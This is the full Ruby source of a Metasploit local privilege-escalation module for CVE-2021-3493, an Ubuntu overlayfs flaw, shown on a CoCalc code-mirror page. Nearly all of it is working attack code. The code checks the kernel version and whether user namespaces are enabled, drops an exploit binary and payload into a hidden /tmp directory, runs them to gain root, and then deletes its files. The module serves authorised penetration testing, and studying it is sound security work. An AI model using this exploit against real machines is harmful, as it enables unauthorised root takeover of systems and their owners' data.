CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GreatRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Post::Linux::Compile

13
  include Msf::Post::Linux::Kernel

14
  include Msf::Post::File

15
  include Msf::Exploit::EXE

16
  include Msf::Exploit::FileDropper

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => '2021 Ubuntu Overlayfs LPE',

23
        'Description' => %q{

24
          This module exploits a vulnerability in Ubuntu's implementation of overlayfs. The

25
          vulnerability is the result of failing to verify the ability of a user to set the

26
          attributes in a running executable. Specifically, when Overlayfs sends the set attributes

27
          data to the underlying file system via `vfs_setxattr`, it fails to first verify the data

28
          by calling `cap_convert_nscap`.

29
          This vulnerability was patched by moving the call to `cap_convert_nscap`

30
          into the `vfs_setxattr` function that sets the attribute, forcing verification every time the

31
          `vfs_setxattr` is called rather than trusting the data was already verified.

32
        },

33
        'License' => MSF_LICENSE,

34
        'Author' => [

35
          'ssd-disclosure',

36
          'bwatters-r7' # Aka @tychos_moose, Metasploit Module

37
        ],

38
        'DisclosureDate' => '2021-04-12',

39
        'Platform' => [ 'linux' ],

40
        'SessionTypes' => [ 'shell', 'meterpreter' ],

41
        'Privileged' => true,

42
        'References' => [

43
          [ 'CVE', '2021-3493' ],

44
          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/' ],

45
          [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ]

46
        ],

47
        'Notes' => {

48
          'Reliability' => [ REPEATABLE_SESSION ],

49
          'Stability' => [ ],

50
          'SideEffects' => [ ARTIFACTS_ON_DISK ]

51
        },

52
        'Targets' => [

53
          [

54
            'x86_64',

55
            {

56
              'Arch' => [ ARCH_X64 ]

57
            }

58
          ],

59
          [

60
            'aarch64',

61
            {

62
              'Arch' => [ ARCH_AARCH64 ]

63
            }

64
          ]

65
        ],

66
        'DefaultTarget' => 0

67
      )

68
    )

69
    register_options [

70
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])

71
    ]

72
    register_advanced_options [

73
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

74
    ]

75
  end

76


77
  def check

78
    arch = kernel_hardware

79


80
    unless arch.include?('x86_64') || arch.include?('aarch64')

81
      return CheckCode::Safe("System architecture #{arch} is not supported")

82
    end

83


84
    release = kernel_release

85
    version = kernel_version

86


87
    unless userns_enabled?

88
      return CheckCode::Safe('Unprivileged user namespaces are not permitted')

89
    end

90


91
    vprint_good('Unprivileged user namespaces are permitted')

92


93
    # If the target is Ubuntu...

94
    unless version =~ /[uU]buntu/

95
      return CheckCode::Safe('Target is not Ubuntu!')

96
    end

97


98
    version_array = release.split('-')

99
    if version_array.length < 2

100
      fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')

101
    end

102
    vprint_status("Version array: #{version_array}")

103
    major_version = Rex::Version.new(version_array[0])

104
    vprint_status("major_version: #{major_version}")

105
    minor_version = version_array[1]

106
    vprint_status("minor_version: #{minor_version}")

107
    lower_bound_version = Rex::Version.new(3.13)

108
    upper_bound_version = Rex::Version.new(5.14)

109
    if major_version > upper_bound_version || major_version < lower_bound_version

110
      return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")

111
    end

112


113
    return CheckCode::Appears

114
  end

115


116
  def exploit

117
    if !datastore['ForceExploit'] && is_root?

118
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

119
    end

120


121
    base_dir = datastore['WritableDir'].to_s

122
    unless writable?(base_dir)

123
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")

124
    end

125


126
    executable_name = ".#{rand_text_alphanumeric(5..10)}"

127
    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

128
    exploit_path = "#{exploit_dir}/#{executable_name}"

129
    if file_exist?(exploit_dir)

130
      fail_with(Failure::BadConfig, 'Exploit dir already exists')

131
    end

132
    mkdir(exploit_dir)

133
    register_dir_for_cleanup(exploit_dir)

134


135
    # Upload exploit

136
    arch = kernel_hardware

137
    vprint_status("Detected architecture: #{arch}")

138
    if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))

139
      fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload')

140
    end

141
    if live_compile?

142
      vprint_status('Live compiling exploit on system...')

143
      upload_and_compile(exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c'))

144
    else

145
      vprint_status 'Dropping pre-compiled exploit on system...'

146
      if arch.include?('x86_64')

147
        precompiled_binary = 'cve_2021_3493.x64.elf'

148
        vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")

149
        upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)

150
      elsif arch.include?('aarch64')

151
        precompiled_binary = 'cve_2021_3493.aarch64.elf'

152
        vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")

153
        upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)

154
      else

155
        fail_with(Failure::NoTarget, "Unknown architecture: '#{arch}'")

156
      end

157


158
    end

159
    register_file_for_cleanup(exploit_path)

160


161
    # Upload payload

162
    payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"

163
    upload_and_chmodx(payload_path, generate_payload_exe)

164


165
    # Launch exploit

166
    print_status('Launching exploit...')

167
    random_string = rand_text_alphanumeric(5..10)

168
    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"

169
    vprint_status("Running: #{cmd_string}")

170
    begin

171
      output = cmd_exec(cmd_string)

172
      vprint_status(output)

173
    rescue Error => e

174
      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)

175
      print_error("Exploit failed: #{e}")

176
    ensure

177
      # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.

178
      cmd_exec("rm -rf '#{exploit_dir}'")

179
    end

180
  end

181
end

182


183